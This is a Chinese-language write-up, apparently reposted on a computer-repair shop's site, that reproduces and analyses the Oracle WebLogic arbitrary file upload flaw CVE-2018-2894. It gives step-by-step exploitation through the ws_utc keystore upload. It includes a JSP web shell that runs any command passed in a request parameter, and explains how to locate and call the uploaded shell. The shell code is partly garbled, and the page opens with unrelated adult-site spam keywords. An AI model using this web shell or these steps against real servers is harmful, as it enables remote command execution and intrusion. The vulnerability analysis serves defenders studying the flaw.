国产精品国内视频,成人福利视频网站,欧美第一精品

錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務

		設為首頁
		收藏本站

首頁

公司介紹

服務項目

服務報價

維修流程

IT外包服務

服務器維護

技術文章

常見故障

錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務 → 技術文章

WebLogic任意文件上傳漏洞復現與分析 - CVE-2018-2894

作者: 佚名日期:2018-07-20 19:56:16 來源: 本站整理

CVE-2018-2894
漏洞影響版本：10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
下載地址：http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip

漏洞復現
服務啟動后，訪問 http://localhost:7001/ws_utc/config.do

可以將當前的工作目錄為更改為其他目錄。以本地環境為例，可以部署到C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war下
選擇右邊的安全欄目，添加JKS Keystores上傳文件。假設chybeta.jsp內容如下：
page import="java.util.*,java.io.*,java.net.*"%>
METHOD="POST" NAME="myform" ACTION="">
TYPE="text" NAME="cmd">
TYPE="submit" VALUE="Send">
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "\n
");
        Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); disr = dis.readLine(); }
        }
%>
抓包獲取到時間戳為1531987145013，則上傳到的位置即config\keystore\1531987145013_chybeta.jsp

訪問http://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp

簡要漏洞分析
在ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59:
public void changeWorkDir(String path) {
    String[] oldPaths = this.getRelatedPaths();
    if (this.testPageProvider.getWsImplType() == ImplType.JRF) {
        this.isWorkDirChangeable = false;
        this.isWorkDirWritable = isDirWritable(path);
        this.isWorkDirChangeable = true;
        this.setTestClientWorkDir(path);
    } else {
        this.persistWorkDir(path);
        this.init();
    }
    if (this.isWorkDirWritable) {
        String[] newPaths = this.getRelatedPaths();
        moveDirs(oldPaths, newPaths);
    } else {
        Logger.fine("[INFO] Newly specified TestClient Working Dir is readonly. Won't move the configuration stuff to new path.");
    }
}
此函數用于改變工作目錄，但其中并未做任何檢測。
在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181中：
@Path("/keystore")
    @POST
    @Produces({"application/xml", "application/json"})
    @Consumes({"multipart/form-data"})
    public Response editKeyStoreSettingByMultiPart(FormDataMultiPart formPartParams) {
        if (!RequestUtil.isRequstedByAdmin(this.request)) {
            return Response.status(Status.FORBIDDEN).build();
        } else {
            if (TestClientRT.isVerbose()) {
                Logger.fine("calling SettingResource.addKeyStoreSettingByMultiPart");
            }
            String currentTimeValue = "" + (new Date()).getTime();   KeyValuesMapString, String> formParams = RSDataHelper.getInstance().convertFormDataMultiPart(formPartParams, true, TestClientRT.getKeyStorePath(), currentTimeValue);
            ....
        }
    }
跟入ws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31
public static String getKeyStorePath() {
        return getConfigDir() + File.separator + "keystore";
    }
得到要寫入的路徑storePath。
在ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145:
public KeyValuesMapString, String> convertFormDataMultiPart(FormDataMultiPart formPartParams, boolean isExtactAttachment, String path, String fileNamePrefix) {
    ...
    if (attachName != null && attachName.trim().length() > 0) {
        if (attachName != null && attachName.trim().length() != 0) {
            attachName = this.refactorAttachName(attachName);
            if (fileNamePrefix == null) {
                fileNamePrefix = key;
            }
            String filename = (new File(storePath, fileNamePrefix + "_" + attachName)).getAbsolutePath();
            kvMap.addValue(key, filename);
            if (isExtactAttachment) {
                this.saveAttachedFile(filename, (InputStream)bodyPart.getValueAs(InputStream.class));
            }
        }
    }
    ...
}
把上傳文件的內容傳到了storePath目錄里，文件名滿足fileNamePrefix + "_" + attachName。這過程沒有任何過濾和檢查：）…
條件：
需要知道部署應用的web目錄
ws_utc/config.do在開發模式下無需認證，在生產模式下需要認證。具體可見Oracle® Fusion Middleware Administering Web Services

Reference
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ

熱門文章

機械革命S1 PRO－02 開機不顯示黑...

聯想ThinkPad NM-C641上電掉電點不...

三星一體激光打印機SCX－4521F維修...

通過串口命令查看EMMC擦寫次數和判...

IIS 8 開啟 GZIP壓縮來減少網絡請求...

索尼kd-49x7500e背光一半暗且閃爍 ...

圖解Windows 7系統快速共享打印機的...

報修電話：13840665804 QQ：174984393 (聯系人:毛先生)
E-Mail：174984393@qq.com
維修中心地址：錦州廣廈電腦城
ICP備案/許可證號：遼ICP備2023002984號-1
上門服務區域: 遼寧錦州市區
主要業務：修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

技術支持:微軟等